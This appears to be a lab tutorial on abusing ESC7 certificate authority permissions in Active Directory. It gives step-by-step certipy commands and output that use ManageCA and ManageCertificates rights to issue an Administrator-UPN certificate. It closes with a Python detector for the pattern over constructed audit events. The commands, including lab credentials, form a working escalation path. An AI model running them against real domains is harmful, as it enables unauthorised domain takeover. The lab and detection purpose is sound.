ESC7
Vulnerable Certificate Authority Access Control
A certificate authority holds a distinct set of permissions crucial for securing various CA functions.
CA Administrator (ManageCA right): This role allows managing the CA's settings, including using the ICertAdminD2::SetConfigEntry method to adjust important configurations, like whether the CA accepts request attributes for Subject Alternative Names (SANs).
Certificate Manager (ManageCertificates right): Also called a CA officer, this role focuses on managing issued certificates.
Abuse from Linux - ManageCA rights
certipy find -u '[email protected]' -p 'Password123!' -stdout -vulnerable
[!] Vulnerabilities
ESC7 : 'LAB.LOCAL\\Black Wasp' has dangerous permissions
The ManageCertificates role allows us to approve pending certificate requests, and granting that role can be done with the ManageCA rights. Combining ManageCA with the ManageCertificates role, we can issue certificate requests that have failed.
The SubCA template is also enabled by default. This template is vulnerable to ESC1 but only permits Domain Admins and Enterprise Admins to enroll.
# Enable SubCA
certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -enable-template 'SubCA'
With ManageCA rights we can assign ManageCertificates rights to any account.
certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -add-officer BlWasp
With the SubCA template enabled and with ManageCertificates rights, we can request a certificate by adding an alternative SAN and selecting the SubCA template.
mczen@htb[/htb]$ certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 31
Would you like to save the private key? (y/N) y
[*] Saved private key to 31.key
[-] Failed to request certificate
The request fails because we are not a member of Domain Admins or Enterprise Admins. Note the request ID (31) and answer yes to save the private key. With ManageCA and ManageCertificates rights we issue the failed certificate request using certipy ca with -issue-request 31.
mczen@htb[/htb]$ certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 31
Retrieve the issued certificate using the request ID (31).
certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 31
Abuse from Linux - ManageCertificates rights
Request a certificate
mczen@htb[/htb]$ certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC7_1 -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[!] Certificate request is pending approval
[*] Request ID is 59
Would you like to save the private key? (y/N) y
[*] Saved private key to 59.key
[-] Failed to request certificate
The output says the certificate request is pending approval and shows request ID 59. Save the private key again and, with ManageCertificates rights, approve the request.
mczen@htb[/htb]$ certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 59
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Finally, retrieve the approved certificate using its request ID (59).
certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 59
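The request IDs above give defenders a correlation point: in the first walkthrough request 31 is denied with CERTSRV_E_TEMPLATE_DENIED and is later issued unchanged after the requester is added as a CA officer, and in both walkthroughs the issued certificate carries a UPN (Administrator) that is not the requester's. The following added Python example (not from the page or from Certipy) flags both patterns over a constructed, simplified event list; event IDs 4882, 4886, 4887 and 4888 are the standard AD CS audit events, but the field names are an assumption and not the Windows event XML schema.

```python
"""Correlate AD CS audit events for the ESC7 pattern: a denied request that is
later issued, an issued UPN that differs from the requester, and a CA permission
change (officer added) before issuance. Added example, not from the page."""

# Constructed sample events in a simplified schema (assumption, not the real
# Windows Security XML). Request 31 mirrors the page: SubCA request denied,
# ManageCertificates granted to the requester, then the same ID is issued.
SAMPLE_EVENTS = [
    {"id": 4886, "requester": "LAB\\BlWasp", "request_id": 31,
     "template": "SubCA", "upn": "Administrator@lab.local"},
    {"id": 4888, "requester": "LAB\\BlWasp", "request_id": 31,
     "status": "CERTSRV_E_TEMPLATE_DENIED"},
    {"id": 4882, "requester": "LAB\\BlWasp", "request_id": None,
     "change": "ManageCertificates granted to LAB\\BlWasp"},
    {"id": 4887, "requester": "LAB\\BlWasp", "request_id": 31,
     "template": "SubCA", "upn": "Administrator@lab.local"},
    {"id": 4886, "requester": "LAB\\alice", "request_id": 40,
     "template": "User", "upn": "alice@lab.local"},
    {"id": 4887, "requester": "LAB\\alice", "request_id": 40,
     "template": "User", "upn": "alice@lab.local"},
]


def account_name(requester):
    """'LAB\\BlWasp' -> 'blwasp' (strip the domain prefix, case-fold)."""
    return requester.split("\\")[-1].lower()


def detect_esc7(events):
    """Return {request_id: [reasons]} for issued certificates (4887) that look
    like ESC7 abuse. Events are assumed to be in chronological order."""
    denied = set()          # request IDs denied earlier (4888)
    ca_acl_changed = False  # a 4882 (CA security permissions changed) seen
    findings = {}
    for ev in events:
        if ev["id"] == 4888:
            denied.add(ev["request_id"])
        elif ev["id"] == 4882:
            ca_acl_changed = True
        elif ev["id"] == 4887:
            reasons = []
            rid = ev["request_id"]
            if rid in denied:
                reasons.append("previously denied request was issued")
            upn_user = ev.get("upn", "").split("@")[0].lower()
            if upn_user and upn_user != account_name(ev["requester"]):
                reasons.append("UPN in certificate differs from requester")
            if reasons and ca_acl_changed:
                reasons.append("CA permissions changed before issuance")
            if reasons:
                findings[rid] = reasons
    return findings
```

Running `detect_esc7(SAMPLE_EVENTS)` flags request 31 with all three reasons and leaves alice's self-enrollment (request 40) alone.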